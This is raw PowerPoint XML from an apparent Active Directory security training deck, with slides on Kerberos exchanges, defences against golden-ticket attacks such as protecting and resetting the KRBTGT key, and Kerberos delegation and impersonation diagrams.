            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>AS_REP (optional, for mutual authentication)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="Picture 46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30FFA3C7-C725-4AE1-8A4B-E07B5B8DB2A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1665091" y="3677366"/>
            <a:ext cx="585218" cy="585218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Straight Arrow Connector 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F5B7718-EA42-4376-952E-C9964D286EE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9229180" y="1602386"/>
            <a:ext cx="0" cy="2384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FDAAE7-0E4C-4F9E-8BB3-78EC73E39D03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9263141" y="2039896"/>
            <a:ext cx="2332099" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Optional PAC validation Request/Response</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="49" name="Picture 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7CB987B3-807E-414B-8FFD-4187C36D1A82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9953647" y="1669441"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="53" name="Picture 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FB8A6A9-A54B-4871-A5CA-87638C8747EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId13"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1873645" y="2059586"/>
            <a:ext cx="390145" cy="390145"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2688952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CF54-E452-4D48-8EF9-3BAAA5E9C431}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Golden Ticket: Defence </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F8C132-87E1-9241-BE66-9ACD04DE7685}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect the KRBTGT account key!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prevent DA from logging onto any computer other than the DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect your backups!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Regular change the KRBTGT account password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://gallery.technet.microsoft.com/Reset-the-krbtgt-account-581a9e51</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Detect based on RC4 usage / behavior analysis tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… then engage some serious incident response…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2783336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6A41-1147-49A3-9EB7-6EDF30D45199}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Part 10: Kerberos Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05846585-145E-4AC9-BE69-C54540A71E0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136834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D172-A879-4E3F-990B-618A295251EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39040C91-F0D9-4FA4-B102-CF7EA3FCB593}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="1357911"/>
            <a:ext cx="9905998" cy="610589"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Giving an account the right to impersonate another account</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCD5BCA-D7AE-4371-9472-C5D3A474B4C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2875818" y="2107505"/>
            <a:ext cx="6437187" cy="4750495"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2467914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3BAB-5502-4167-A1ED-6B0A10182E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321A5C81-1D6C-4A87-A29C-5C19BDE85707}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5704268" y="3184111"/>
            <a:ext cx="1560580" cy="1560580"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42FD3C3E-E27F-4B62-86C3-C889CBA7F491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9960355" y="3184111"/>
            <a:ext cx="1560580" cy="1560580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F04464D-7155-47FD-B19B-1CE435D43993}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="553210" y="3184111"/>
            <a:ext cx="1560580" cy="1560580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Arrow: Right 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE88EB2-914B-4055-8E90-B2206BA139E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6814584" y="3088861"/>
            <a:ext cx="3302000" cy="11303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Service: Select * from articles</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Arrow: Right 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1714DA7B-46F2-4831-9618-71873D930307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2402268" y="3173412"/>
            <a:ext cx="3302000" cy="11303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User: Show me articles </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1549369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3BAB-5502-4167-A1ED-6B0A10182E18}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{321A5C81-1D6C-4A87-A29C-5C19BDE85707}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5704268" y="3184111"/>
            <a:ext cx="1560580" cy="1560580"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42FD3C3E-E27F-4B62-86C3-C889CBA7F491}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9960355" y="3184111"/>
            <a:ext cx="1560580" cy="1560580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F04464D-7155-47FD-B19B-1CE435D43993}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="553210" y="3184111"/>
            <a:ext cx="1560580" cy="1560580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Arrow: Right 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BE88EB2-914B-4055-8E90-B2206BA139E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6814584" y="3088861"/>
            <a:ext cx="3302000" cy="11303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User: Select * from articles</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Arrow: Right 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1714DA7B-46F2-4831-9618-71873D930307}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2402268" y="3173412"/>
            <a:ext cx="3302000" cy="11303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User: Show me articles </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F392897-0E99-4E93-A10A-D7BC2D09D78E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8753690" y="238145"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Arrow: Down 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38CE4D9D-3984-483F-BC1D-84CD93E8F092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="13503890">
            <a:off x="6096000" y="0"/>
            <a:ext cx="1168848" cy="24765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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ticket for “User” please</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Arrow: Down 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8865E6DA-14F6-4B59-BB4F-4F5215B984D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2855887">
            <a:off x="6709856" y="751125"/>
            <a:ext cx="1168848" cy="24765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bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You are “User” now…</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204254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05A068-CEB6-4E89-B60E-773B9A07F911}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260088" y="-1457"/>
            <a:ext cx="9612351" cy="6818726"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="624292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D6B6B3C-A678-4484-A5C1-956772EBBE6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47064" y="188259"/>
            <a:ext cx="12062012" cy="662846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125F58-6609-F147-9BE6-724F328E4510}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Unconstrained Delegation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F65EA6EB-68F8-429B-A7E5-64D6ABADBCD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2420170" y="2619913"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2587669-04D0-4D9B-81BB-BC081DF06181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8079454" y="4302120"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44A12586-5F11-48A7-9A21-AA54520F406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448890" y="745904"/>
            <a:ext cx="780290" cy="780290"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A5CAAA-C8CF-49CC-9F3F-186E95C82D46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
